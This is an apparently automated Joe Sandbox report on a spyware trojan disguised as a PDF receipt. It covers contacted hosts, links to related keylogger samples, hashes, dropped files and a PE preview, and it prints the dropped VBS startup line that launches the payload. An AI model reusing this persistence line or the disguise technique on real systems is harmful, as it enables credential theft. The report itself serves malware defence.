InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.oleonidas.gre-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.0000000003051000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.org/xml/e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        188.114.96.3
                                                        		reallyfreegeoip.orgEuropean Union
                                                        		13335CLOUDFLARENETUSfalse
                                                        185.78.221.73
                                                        		oleonidas.grGreece
                                                        		47521IPHOSTGRIpDomainGRfalse
                                                        132.226.247.73
                                                        		checkip.dyndns.comUnited States
                                                        		16989UTMEMUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1553407
                                                        Start date and time:2024-11-11 05:16:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:e-dekont (72).pdf(#U007e56 KB).exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:e-dekont (72).pdf(~56 KB).exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 585
                                                        • Number of non-executed functions: 34
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 1436 because it is empty
                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 1476 because it is empty
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        05:16:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
                                                        23:16:51API Interceptor20x Sleep call for process: e-dekont (72).pdf(#U007e56 KB).exe modified
                                                        23:16:57API Interceptor14707323x Sleep call for process: InstallUtil.exe modified
                                                        23:17:05API Interceptor17x Sleep call for process: TypeName.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        188.114.96.3Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • paste.ee/d/MQCNr
                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/lRzZ57eB/download
                                                        Ordine R04-T4077 TBA-2024.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • paste.ee/d/EyFwK
                                                        aesM8nmCM2.exeGet hashmaliciousUnknownBrowse
                                                        • start7345724.ru/new/net_api
                                                        RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                        • www.lnnn.fun/u5w9/
                                                        ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                        • www.rihanaroly.sbs/othk/
                                                        Aviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                        • paste.ee/d/PAg0l
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/8shpYIj5/download
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/CXujY04Y/download
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/O2nyeCCn/download
                                                        185.78.221.73DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                          RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              132.226.247.73MJ5bO7kS7j.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              7DqFctwwsk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Ordine R04-T4077 TBA-2024.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              W1D5wGM20v.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • checkip.dyndns.org/
                                                              khVFdtvf8F.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              0Pk2HlsnGS.exeGet hashmaliciousMassLogger RATBrowse
                                                              • checkip.dyndns.org/
                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              6b94X7dMrG.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              reallyfreegeoip.org173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              zam.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              MJ5bO7kS7j.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              7DqFctwwsk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              checkip.dyndns.com173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 193.122.6.168
                                                              17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 193.122.130.0
                                                              Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              SecuriteInfo.com.Win32.CrypterX-gen.14627.27546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 193.122.130.0
                                                              zam.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              MJ5bO7kS7j.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.247.73

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              https://ethnikos-fc.blogspot.co.uk/2013/08/blog-post_11.htmlGet hashmaliciousUnknownBrowse
                                                              • 104.18.10.207
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.96.3
                                                              https://facebook-metasupbosanhuc.uncody.site/Get hashmaliciousUnknownBrowse
                                                              • 172.67.145.96
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              http://192.3.220.22/430/dllhost.exeGet hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              IPHOSTGRIpDomainGRDHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                              • 185.78.221.73
                                                              RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 185.78.221.73
                                                              PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 185.78.221.73
                                                              433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                              • 185.78.220.138
                                                              https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                              • 93.174.123.195
                                                              https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                              • 93.174.123.207
                                                              Prices_Required.exeGet hashmaliciousDarkCloudBrowse
                                                              • 185.78.220.151
                                                              pw5tgKfhDO.elfGet hashmaliciousMiraiBrowse
                                                              • 185.78.220.47
                                                              botx.arm.elfGet hashmaliciousUnknownBrowse
                                                              • 185.78.220.23
                                                              http://659jup6bicvl.zirino.com/c3VwcG9ydEBtb25vY2VyYS5jbw==Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                              • 93.174.125.176
                                                              UTMEMUS17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 128.169.185.69
                                                              Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 128.169.66.86
                                                              fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.8.169
                                                              MJ5bO7kS7j.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.247.73
                                                              7DqFctwwsk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 132.226.247.73
                                                              Ordine R04-T4077 TBA-2024.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.247.73
                                                              Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 132.226.8.169
                                                              ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 132.226.247.73

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              54328bd36c14bd82ddaa0c04b25ed9ad173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              ERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              ERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              zam.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              3b5074b1b5d032e5620f69f9f700ff0ehttp://perpetualsnob.comGet hashmaliciousUnknownBrowse
                                                              • 185.78.221.73
                                                              173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 185.78.221.73
                                                              17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 185.78.221.73
                                                              file.exeGet hashmaliciousFormBookBrowse
                                                              • 185.78.221.73
                                                              file.exeGet hashmaliciousFormBookBrowse
                                                              • 185.78.221.73
                                                              Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                              • 185.78.221.73
                                                              main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                              • 185.78.221.73
                                                              A3W2CpXxiO.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 185.78.221.73
                                                              WDSecureUtilities(1).exeGet hashmaliciousPhemedrone StealerBrowse
                                                              • 185.78.221.73
                                                              Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                              • 185.78.221.73

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs

                                                              Download File
                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):84
                                                              Entropy (8bit):4.803946256081595
                                                              Encrypted:false
                                                              SSDEEP:3:FER/n0eFHHoUkh4EaKC5fQSiHHn:FER/lFHI9aZ5YSin
                                                              MD5:959996C96B95DE7CFA11C0AE1340F1C8
                                                              SHA1:9302F666D56BB7596AD4B8D8C5005740F85047D5
                                                              SHA-256:0CFC3704C29220B9EA0702EB4A144288F1B8115B9194285A7694D9FB1068293E
                                                              SHA-512:03B6ED6DAF1651987D022644BBA9903D60BAB077E0A597DD60AF851C2979D827B508EAA35AC3EA4A726FA1F7CC8C5FEB87776E5688145CC331A68E082660BFF9
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\TypeName.exe"""

                                                              C:\Users\user\AppData\Roaming\TypeName.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1250816
                                                              Entropy (8bit):5.614106741263722
                                                              Encrypted:false
                                                              SSDEEP:24576:KqH4yLXhLnk1EhgwluwEAMBVuZh9zwVb1:KqHn2wowEA049zwVb
                                                              MD5:D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              SHA1:844A9EA45EEC0DC6E5418735DAD17FA4C45F589D
                                                              SHA-256:73E2CBDBD6EBF0C6FA0A287B375B719B3F576287C7950458D6A75F4E293F7655
                                                              SHA-512:8C75C5C84EDC33DA74011B7BE370061B3B6E3ADD6DAEA4F935B9A1EB2336D638160847293B057F9EDEED98686E64B5212B851AFAB6D8D72D9C70166F93C1CCBE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 11%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!P1g............................n+... ...@....@.. ....................................`................................. +..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P+......H........5..TB..........Tw..............................................*...(....*..0.......... ........8........E........S...,.......8......(....}.... ........8......|....(....*...}.... ....~....{>...9....& ....8......|......(...+ ....~....{*...:v...& ....8k.....(....&*.0..S....... ........8........E........w.......................................8.....s....r...ps....(....o...... ....~....{....:....& ....8........E........8.....x...& ....~....{E...:....& ....8........E.....

                                                              C:\Users\user\AppData\Roaming\TypeName.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):5.614106741263722
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:e-dekont (72).pdf(#U007e56 KB).exe
                                                              File size:1'250'816 bytes
                                                              MD5:d99d18dbd5825f0fddef9063b0afdf9c
                                                              SHA1:844a9ea45eec0dc6e5418735dad17fa4c45f589d
                                                              SHA256:73e2cbdbd6ebf0c6fa0a287b375b719b3f576287c7950458d6a75f4e293f7655
                                                              SHA512:8c75c5c84edc33da74011b7be370061b3b6e3add6daea4f935b9a1eb2336d638160847293b057f9edeed98686e64b5212b851afab6d8d72d9c70166f93c1ccbe
                                                              SSDEEP:24576:KqH4yLXhLnk1EhgwluwEAMBVuZh9zwVb1:KqHn2wowEA049zwVb
                                                              TLSH:E8459417F94799A3C29D2737C6ABA80E13F5E9856327D70B798E237A18C37B74841603
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!P1g............................n+... ...@....@.. ....................................`................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x532b6e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x67315021 [Mon Nov 11 00:30:25 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
